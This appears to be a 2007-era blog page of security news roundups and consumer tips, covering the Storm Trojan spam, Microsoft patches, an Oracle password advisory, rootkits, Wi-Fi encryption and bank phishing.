"have any of you tried 'avast' ? it's supposedly free and what Im using right now, but I don't know if its any good..I might check out AVG later."
"Norton is better,it scan everything,the temporary files also,with quick review"

This article is nowhere related to anyone personally,its all from the public feedback on the internet.
powered by the user



Stay Safe On Net with All-In-One User-Friendly Software


All-In-One User-friendly software helps you stay safe on the Net


NEW TREND Micro's PC-Cillin Internet Security 2007 is marketed as a one-stop protection for all your Internet needs which includes antivirus, antispyware, firewall, fraud defence and network monitoring security.You can install PC-Cillin on up to three different PCs. Interface wise, PC-Cillin does nothing to look different from other security suites. In any case, the interface is easy to use even beginners will have no trouble getting to the individual features such as firewall and email scanning.
Once the program is up and running you will be asked to perform a full scan of your hard drive. PC-Cillin conveniently splits the results of the scan into three main categories: Viruses, Spyware and Microsoft System Vulnerabilities.
The program's antivirus function proves adequate protection from online threats. The antivirus can be set to scan all files on access and even automatically schedules a wide variety of scan types. On a relatively clean system, PC-Cillin was able to scan it in under 10 minutes.
PC-Cillin also performs other tasks like monitoring network traffic, multi-layered scanning of compressed files for viruses and automatic protection of other PCs on your network.
We liked the fact that PC-Cillin not only identifies potential security holes in your system but it even prompts you to update the program by linking you to all the files you need.
This can come in useful if you don't constantly update your system or missed out on one particular update. PC-Cillin also covers popular Instant Messaging clients such as MSN Messenger. It also filters spam, though it does this with varying results, as it will occasionally let one or two slip through. You can set three levels of spam detection if you find the current level inadequate. But be warned that a higher level of detection would result in more email messages being flagged as spam.
In addition to all the other features, Trend Micro has provided Transaction Guard, a tool designed to protect users while making online transactions on an unsecured public computer.
It features two forms of protection with one being a spyware monitor, which lets you know whether you are on a secure site.
All in all, PC-Cillin Internet Security 2007 provides a one-stop security package for mobile users.
So friends,in the security world one new software have been launched which is capable of providing all type of security at a same time,just go and check this s/w.

Zipped Trojan Storms Back in Internet World


Zipped Trojan Storms Back

A new spam attack containing the threat Trojan.Peacomm, or Storm Trojan that is being distributed via a password protected Zip file has been identified by the Symantec.

Symantec has detected more than 2 million spam messages distributed worldwide, targeting mostly English speaking countries and affecting both consumers and enterprises prompting Symantec Security Response to raise the ThreatCon level to a Level 2 with Level 4 being the highest alert.This threat was originally discovered in January 2007 but has been repackaged in this particular spam surge. This trojan horse arrives as an attachment to an email purporting to contain a security patch. The email appears to warn the user about a malicious threat and implies that the file attachment is a security patch that will protect the user from this threat.

However, the attachment itself is a malicious threat. The attachment is a password-protected ZIP file. It contains a trojan horse that will install itself on the system as a system driver and then will download other malicious programs from various computers on the Internet. The file contained within the ZIP file will be detected as Trojan.Packed.13. If the user executes this file it will create another file that will be detected as Trojan.Peacomm.

This type of message are shown:
Worm Detected![UNABLE TO SCAN] Worm Detected![WARNING - ENCRYPTED ATTACHMENT NOT VIRUS SCANNED] Virus Alert![WARNING - ENCRYPTED ATTACHMENT NOT VIRUS SCANNED] Worm Detected!Worm Detected!Undeliverable: Virus Det

To reduce the possibility of being affected by threats exploiting this vulnerability, to do the following:
Keep antivirus and IPS detection signatures updated.
Never click on attachments or web links from unsolicited emails.
Regularly apply security patches and updates to all major software installed on the computer.
Use a security solution that contains antivirus and client firewall technologies, such as Symantec Client Security or Norton Internet Security, to protect against today's known and tomorrow's unknown threats.
Organizations should install and maintain a perimeter firewall to protect the entire internal network. Be sure to use permit by exception rules on the firewall.
Organizations should check all external systems for security compliancy before permitting any connectivity to an internal network.

Microsoft Release Four Security Fixes Emergency Patch


Microsoft Corporation has corrected the problems caused by last week's emergency patch, by releasing a four security fixes it deems critical as part of its regularly scheduled software updates.Three of the updates marked with Microsoft's highest threat rating plug holes in the Windows operating system; the vulnerabilities could be used by hackers to install malicious code on personal computers. The fourth fixes a security flaw in Microsoft Content Management Server software, a business application.Microsoft broke its normal once-monthly update schedule with an emergency fix for the way many versions of Windows, including the newly released Vista, handle animated cursor files,last Tuesday. Microsoft and security experts had found that hackers were exploiting the hole and installing malicious software on personal computers. That critical fix was also added to the April scheduled update.According to a Microsoft security blog, last week's patch broke some third-party programs, including audio software from Realtek; ElsterFormular German tax software; TUGZip, a free file-archiving utility and CD-Tag, a program that turns CDs into digital audio files. Microsoft said the latest update will fix the problems for Computers that have been affected by installed programs or that have the error program installed.Computer users with Microsoft's automatic updates feature enabled in Windows do not have to do anything to get these repairs. Others should visit Microsoft's security Web site at www.microsoft.com/security. For machines at work, system administrators sometimes wait until they can test the updates first for any conflicts with internal operations. An important security by Microsoft was also released-one notch below critical-to stop hackers from taking over a computer by gaining high-level system privileges.
Also included in last Tuesday's scheduled update were a new version of the Windows Malicious Software Removal Tool, which identifies malware, and several non-security items including a refinement to the way Windows Mail identifies junk e-mail and grammatical fixes for certain foreign-language versions of Windows Vista.

Internet Security and Acceleration Server 2000 Service Pack


How to obtain the latest Internet Security and Acceleration Server 2000 service pack


Microsoft Internet Security and Acceleration (ISA) Server 2000 updates are distributed through service packs. By installing the latest service pack, you keep your installation of ISA Server 2000 current. Service packs include updates and fixes that are conveniently bundled for easy downloading. Service packs are cumulative; each new service pack contains all the fixes that are included in previous service packs and any new fixes. You do not have to install a previous service pack before you install the latest one. ISA Server 2000 Service Pack 2 (SP2)
loadTOCNode(2, 'moreinformation');Release Date: May 20, 2004.Note You can install Service Pack 2 for ISA Server 2000 with or without ISA Server 2000 Service Pack 1 (SP1) already installed on your system.

To download Service Pack 2 for ISA Server 2000, visit the following Microsoft Web site:
http://www.microsoft.com/downloads/details.aspx?FamilyId=C8D3D98B-1CD4-406A-A04A-2AA2547D09A3&displaylang=en (http://www.microsoft.com/downloads/details.aspx?FamilyId=C8D3D98B-1CD4-406A-A04A-2AA2547D09A3&displaylang=en)

Naked Paris Hilton used By Hackers


Hackers found hole in Vista

Even the vista is not safe.A hole has been discovered in it.Internet and computer security firms are warning Window’s Vista users to stay away from spam emails offering a peak at a naked Paris Hilton! Hacker’s have found a hole in Vista and are exploiting it by luring users with subject lines promising “Hot pictures of Paris Hilton nude” with a link to a website that inserts Trojan Horse type code into the system.This Trojen Horse get installed on computer as it is clicked and make the computer data available to the hackers.Honestly, who would click on these emails? Is there anyone left in the world outside of Amish country that hasn’t seen Paris Hilton in some sort of undress? These hackers would be better off luring us with someone not so over exposed like britney spears or other.
So,beware of this kind of fake e-mails,and if you get this kind of e-mails,don't click on this e-mails.It would be better to delete them without clicking or use some antivirus to detect them.

China Cracks Down On Online Porn


A state news agency said on Friday,the Chinese Government is launching a new crackdown on online pornography, complaining it has "perverted China's young minds,"The Ministry of Public Security says the six-month campaign will target cyber strip shows and sexually explicit images, stories and audio and video clips, according to the Xinhua News Agency.Zhang Xinfeng, a deputy public security minister, quoted as saying on Thursday "The boom of pornographic content on the Internet has contaminated cyberspace and perverted China's young minds,".Also Friday, police announced that two Web site operators were sentenced to four years in prison and a third got one year for distributing pornographic movies and other materials in separate cases last year, the Xinhua agency reported.One of the Web sites had signed up 260,000 users when its operator was arrested last year, Xinhua reported. In another case, it said, four people were arrested for distributing material online and 400 computers were seized.Police also have broken up crime rings that used the Internet to organize prostitution, Xinhua said.The latest campaign also will target illegal online lotteries and contraband trade, fraud and "content that spreads rumors and is of a slanderous nature," Zhang said at a news conference.In China's biggest online porn case to date, Web site operator Chen Hui was sentenced in November to life in prison. The government said his Web site had more than 9 million pornographic images and more than 600,000 registered users.China has the world's second-biggest population of Internet users after the United States, with 137 million people online.The communist government encourages Internet use for education and business but tries to block access to material considered obscene or subversive."The inflow of pornographic materials from abroad and lax domestic control are to blame for the existing problems in China's cyberspace," Zhang said.According to Xinhua, the Beijing Reformatory for Juvenile Delinquents said 33.5 percent of its detainees were influenced by violent online games or erotic Web sites when they committed crimes such as robbery and rape.

U.S. Agencies Get 'C-' For Computer Security


According to an annual report card required by federal legislation, the majority of twenty-four U.S. government agencies continued to score sub-par grades in computer security for 2006.While the overall grade of the agencies averaged to a 'C-' — a slight improvement over the 'D+' received in 2005 — the individual grades ranged across the spectrum. Some of the U.S. government's largest agencies — including the Departments of Commerce, Defense, Education, State, and Treasury — scored failing grades.Other agencies dramatically improved their grades from last year. The Department of Health and Human Services improved last year's 'F' to a 'B' in 2006, while the Department of Housing and Urban Development jumped from a 'D+' to an 'A+', according to the score card .
The grades are based on numerical scores ranking the agencies' compliance with the Federal Information Security Management Act (FISMA) of 2002, which requires that the agencies secure their information systems according to guidelines developed by the National Institute of Standards and Technology and file annual reports about their compliance.
"FISMA is to some extent a paper exercise," said Jeremy Nazarian, vice president of marketing at network security firm Lumeta. "And, although it's not a complete representation of how an agency is doing, the score is ultimately a decent measure of how well aligned an organization is with security policies as defined by NIST."The FISMA grades are based on the security reviews performed by the agencies, including progress in correcting previously identified weaknesses and the results of system hardening. Each agency is required to submit a report on their findings by October to the Office of Management and Budget.

Oracle 11i: Encrypted Password String Disclosure


Oracle 11i: Encrypted Password String Disclosure
Integrigy has release an advisory regarding an undisclose security vulnerability in Oracle Applications 11i that may allow an unauthenticated, internal attacker to obtain Oracle Applications' user account encrypted password strings, which in turn can be decrypted using previously published information. An attacker can potentially obtain either any user's password or the Oracle Applications' main database account password (APPS). The attacker must have direct SQL*Net access to the database (e.g., SQL*Plus) and to exploit the vulnerability neither of the Oracle Applications security features "Managed SQL*Net Access" and "Server Security" can be enabled.In a majority of Oracle Applications implementations, neither "Managed SQL*Net Access" nor "Server Security" are enabled. "Managed SQL*Net Access" is enabled by default beginning with 11.5.10, although, it is commonly disabled due to the complexity of managing permitted hosts and the limitations in only allowing a small number of hosts direct access to the database. "Sever Security" is not enabled by default in any version of Oracle Applications and seldom is enabled as the purpose and security benefits of this feature are poorly understood. All Oracle Applications implementations should enable at least "Server Security" and preferably also enable "Managed SQL*Net Access". The underlying issue is that Oracle Applications passwords can be easily decrypted using methods previously published. There are a number of ways an attacker (most likely an insider) may obtain encrypted password strings, including through ad-hoc query access, from cloned instances like development, or through SQL injection vulnerabilities in the application or standard database packages. The advisory relates to an additional method of obtaining encrypted passwords strings through exploitation of a specific undisclosed security vulnerability.For more information see the Integrigy Security Advisory Oracle Applications 11i Encrypted Password Disclosure

Norton Security: New Design with More Content, Multilingual Worldwide Presence


Norton Security Store has made a thorough update in order to bring the latest product in Internet security field. With its new design, user friendly navigation -- and new Symantec and Norton products offered in countries all over the world -- Norton Security Store has made another big step in its online offer of downloadable Symantec software. Vancouver, BC, Canada (PRWEB) April 12, 2007 -- GoClickGo Marketing Inc., the founder and creator of Norton Security Store, is proud to announce the official launch of its redesigned online community, a comprehensive, centralized repository of valuable information and tools to help PC users increase security and keep their computers safer, more secure and available 24/7. Visitors entering the site will be in a position to immediately identify themselves by geographic region - U.S. & Canada, U.K. & Ireland, Australia, Austria, Denmark, Finland, France, Germany, Italy, Netherlands, Norway, Spain, Sweden, and Switzerland. From there, they can choose to explore a range of PC security related sections for information and recommendations, including:
- -Internet Security - This section includes reviews, features/benefits and special offers available on the latest versions of Symantec's industry-leading Internet Security solutions: Norton 360, Norton Internet Security 2007, Norton AntiVirus 2007 and Norton Confidential.
- -Virus Protection - Visitors can learn more about reviews, features/benefits and special offers available on Symantec's famous Virus Protection solutions: Norton 360, Norton AntiVirus 2007 and Norton Internet Security 2007.
- -PC Performance - Users can check out reviews, features/benefits and special offers available on Symantec's famous PC Performance and problem solving solutions: Norton 360, Norton SystemWorks Premier and Norton SystemWorks Standard.
-- Data Protection - In this section, PC users can learn more about reviews, features/benefits and special offers available on Symantec's famous Data Protection products: Norton 360, Norton Save & Restore and Norton Ghost 10.0.
-- Macintosh. Although Macs are generally regarded as safer from PC security threats, this section includes important information about solutions to Mac-related anti-virus and other issues: Norton Internet Security 3.0 Macintosh, Norton AntiVirus 10.0 for Macintosh and Norton Personal Firewall for Macintosh. Products descriptions, reviews and comparison tables are available as an additional help, all in order to have visitors educated before they make their final purchase decision. The site also features Symantec's line of products for Small & Mid-Sized Business, to fulfill the needs of those that require more than what family of Norton products can offer. Knowledge Center offers compilations of valuable information available on PCs viruses, Trojan horses, worms and other serious computer threats for users of all types. The site also provides current information on price and direct purchase links, "completing the cycle" for PC users wanting a front-to-back resource for all security issues and needs.
For more information on Norton Security Store, contact visit web site at Norton-security-store.com

Scaling back Web browser security expectations


Today, the browser has become one of the most critical and most used pieces of software on everyone's computer,consequently, it has become the focus of attack by the hackers and viruses.Despite the best efforts of the computer security industry, the number of flaws continues to grow; new ones have already been found in Microsoft Internet Explorer 7, and Firefox is coming under increasing scrutiny by industry experts and attackers. Browser vendors are faced with the impossible task of writing flawless code while hackers only have to spot one error in order to find an attack vector. The emergence of the "exploits-as-a-service" business, where malware is sold to organized crime, has helped to increase the cries for better Web browsers and Web browser security.So how would the ideal browser differ from what we have today? Microsoft has certainly eased its software repair process via automatically installed Internet updates, and the introduction of a software "sandbox" will help limit damage even if a malicious program is able to subvert the operation of IE 7. But what more is required? Web browser security is an ongoing issue because a browser cannot distinguish between malicious and non-malicious content. The critical question is, at what point should the browser defer to the user's decision to allow particular content, versus blocking it regardless? With current browsers, the initial settings make many security decisions automatically on behalf of the user. However, we all know how annoying it is when Outlook, for example, decides for us which attachments we can and cannot open. At the other extreme, it is very disconcerting when a desktop firewall asks for your decision on every incoming probe or request. There are so many, productivity collapses and click fatigue sets in.
We need to change our perception of the Internet and accept that there is an element of risk when we use it, since it's unlikely that browsers will ever be able to make all our security decisions for us or protect us from every danger, known and unknown,there will always be some coding flaws that don't get spotted.

Microsoft Warns Of 4 "Critical" Security Holes


FOUR "Critical" Security Holes
SAN FRANCISCO:- On Tuesday, Microsoft Corporation warned of four security flaws in its software that it categorized as "critical" that could allow attackers to gain control of a user's computer.Microsoft, whose Windows operating system runs some 95 percent of the world's computers, issued the patches as part of its monthly security bulletin.The world's biggest software maker defines a flaw as "critical" when it could allow a damaging Internet worm to replicate without the user's doing anything to the machine.The company said the "critical" patches fixed three holes in its Windows operating system and another in its Content Management Server product. Microsoft also issued another security update for Windows it rated at the lower threat level of "important."ADVERTISEMENT (article continues below)The fixes come a little more than a week after it released a patch outside of the regular monthly update to plug a security hole related to an animated cursor that hackers had used to launch attacks after users clicked on links to malicious Web sites. The company has been working to improve the security and reliability of its software as more and more malicious software target weaknesses in Windows and other Microsoft software.
The latest patches can be downloaded at http://www.microsoft.com/security.

Free Antivirus Download Roots Out Rootkits


Rootkits are becoming more dangerous in comparison to earlier malware because they are often overlooked by conventional antivirus systems. They execute by embedding applications within the operating system, so it is important to correctly distinguish between malicious rootkits and legitimately hidden processes.Rootkits, a specific malware type which hides in other applications or in a computer's operating system kernel, allow malicious applications to collect passwords and sensitive data from the infected computer without user knowledge. This collected personal information can be used to create spam from the infected computer as well as other criminal activities.Larry Bridwell, vice president of Global Security Strategies for Grisoft explain"Rootkits are computer code that attempt to hide their actions and processes, making the job of detecting the code and the harmful processes very difficult,". "AVG Anti-Rootkit is developed to detect and destroy rootkits effectively, without bothering users with false alarms." Even if an antivirus program detected intrusions in files on the hard drive after scanning every file, it cannot completely remove the altered files. Once the user reboots the computer, the rootkit recreates the necessary files."Rootkits fool these antivirus applications and change the kernel so they can operate at ring 0 as hidden files. When a traditional antivirus scan is performed, they find nothing," said Carlson.
One Thinking Of Removal
Grisoft decided to release the free rootkit download now rather than waiting. The company plans to offer a paid version of the rootkit technology in the fall as part of the release of its version 8.0 security suite. "We didn't want to hold up getting this protection into the hands of 50 million people relying on our free security products," Carlson explained

Secure Your Wireless Network

No one can intercepts your Wi-Fi traffic,just Follow a few easy steps.

The first line of defense for your Wi-Fi network is Encryption, which encodes the data transmitted between PC and wireless router. Unfortunately, most routers ship with encryption turned off, and many users don't turn it on, leaving themselves completely exposed. If you haven't already, enable your router's encryption, and use the strongest form supported by your network. The Wireless Protected Access (WPA) protocol and more recent WPA2 have supplanted the older and less-secure Wireless Encryption Protocol (WEP).
Go with WPA or WPA2 if at all possible, since WEP is relatively easy to crack. (You have to use the same form on all devices on your network; you can't mix WEP and WPA.) The keys used by WPA and WPA2 change dynamically, which make them nearly impossible to hack. Use a strong password for your encryption key, such as a combination of letters and numbers of 14 characters or more.Make sure you change the default network name and password on your router. Doing so will make it much more difficult for hackers to break into your router and commandeer its settings.
FIREWALL
The firewall built into your router prevents hackers on the Internet from getting access to your PC. But it does nothing to stop people in range of your Wi-Fi signal from getting onto your network--and with the latest high-performance equipment, your Wi-Fi signal could reach clear down the block. Without encryption and other protective measures, anyone can use readily available tools to see all your Wi-Fi traffic.
Secure notebook at public Wi-Fi hotspots
Make sure it's a legitimate hotspot, Nefarious types have been known to set up pirate routers with familiar SSID names like "wayport" or "t-mobile," and then use them to capture unsuspecting users' log-on information and other private data. Verify that your PC's software firewall is turned on, and that Windows' file-sharing feature is off; it's off by default in Windows XP with Service Pack 2. To check this setting, open Control Panel and choose Windows Firewall (you may have to click Security Center first in XP or Security in Vista). In XP, select the Exceptions tab, and look in the Programs and Services to make sure "File and Printer Sharing" is unchecked. In Vista, click Change settings, then select the Exceptions tab and follow the instructions for XP. Never send bank passwords, credit card numbers, confidential e-mail, or other sensitive data unless you're sure you're on a secure site: Look for the lock icon in the bottom-right corner of your browser, as well as a URL in the address bar that begins with https. Such sites build in their own encryption. Always turn your Wi-Fi radio off when you're not at a hotspot: Hackers can use it to create peer-to-peer Wi-Fi connections with your computer and access it directly.

Unsafe computer users:Prosecute

victims of computer viruses should be prosecuted.

In todays world,Internet is playing a vital role in everyone's life and that unprotected computers are at risk from computer viruses, trojans, rootkits, spyware, adware, and malware in general. Security software is everywhere.An estimated 90 percent of all email is spam. That's nine out of 10 phone calls you receive coming from telemarketers, or 54 minutes of every one-hour television show taken up by commercials. What would you do about that?Antivirus and firewall software is so widely available that it is a complete mystery why anyone would not have it. Since most software either upgrades itself or prompts the user to install upgrades, there is no reason not to have the latest and most secure versions. Responsible computer users know not to click on strange attachments in emails from mysterious senders but antivirus software has become so dummy-proof that it will intercept viruses from attachments users click on anyway (assuming the antivirus software is up-to-date, that is).

What should be the punishment that fits the crime, you ask? Long and Hard prison time is tempting, but the prisons are already overcrowded with criminals far less disruptive to society than spammers. Revoking Internet access goes without saying. Perhaps a more appropriate punishment would be on the scale of that given to the mythological Sisyphus. But instead of having to roll a stone to the top of a hill only to have it roll back down again for all of eternity, let the spambot owners be damned to cleaning out an inbox only to have it filled back up with spam over and over and over again.
Do you think all this can stop it??????



Banks Tighten Web Security

Banks tighten Web security to help keep thieves out of accounts

Banks has tighten the web security to help keep thieves out of accounts.The Community bank has been the target of so-called "phishing" e-mails in which crooks posing as the bank promise a $50 reward to people willing to answer a five-question survey. To receive the bogus reward, participants are instructed to type in their online access ID, password, debit card number and other confidential data.At the same time, a computerized telephone campaign run by anonymous thieves was contacting people in West Bend - on the likely chance it would connect with West Bend Savings Bank customers - to falsely warn of fraudulent activity in their account and ask them to call a special number to verify private financial information."They will want you to give your credit or debit card number, and if you do that, they will ask for your PIN; or for a credit card, ask for the three numbers on the back," said Rick Larson, the bank's chief operating officer. "The moment you do that, they are going on a spending spree."The good news is that as frustrating as it sometimes is for banks to protect consumers from Internet and telephone predators, they are achieving some success at keeping them out of consumers' online bank accounts.Under pressure from regulators, banks and credit unions have been making it more difficult for thieves to gain access to online bank accounts. That's important because about 40% of U.S. households now do some banking over the Internet, according to Celent, a Boston-based technology research firm.